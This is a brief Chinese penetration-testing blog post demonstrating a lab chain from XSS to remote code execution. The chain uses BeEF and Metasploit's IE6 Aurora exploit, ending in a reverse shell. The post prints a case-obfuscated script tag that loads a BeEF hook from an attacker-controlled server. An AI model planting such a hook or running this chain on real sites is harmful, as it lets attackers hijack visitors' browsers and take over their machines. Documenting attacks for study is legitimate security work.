一次xss到rce

作者 : laolisafe 本文共178个字,预计阅读时间需要1分钟 发布时间: 2019-03-18 共2.62K人阅读

本次beef结合msf 完成整个攻击过程
启动beef
beef


xss代码(beef生成):
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示:

xss执行

配置msf
payload
ms10_002_aurora (ie6 极光漏洞)
配置:

开始监听:

手动游览器执行:

(使用beef重定向到该url也可以)
上线:

反弹shell


转载声明:本站文章若无特别说明,皆为原创,转载请注明来源:大老李的Blog,谢谢!^^
大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区 » 一次xss到rce

常见问题FAQ

下载须知:
所有工具以及资源来自网络收集,所有下载,仅供学习交流。禁止利用从本站点下载的工具进行非法活动,从事危害国家网络安全等行为,请遵守相关法律规定,如有违反与本站无关。
会员的作用是什么?
本站会上线exp漏洞库与最新0day供会员下载

1 评论

  1. 很多往事

发表评论

提供最优质的资源集合

立即查看 了解详情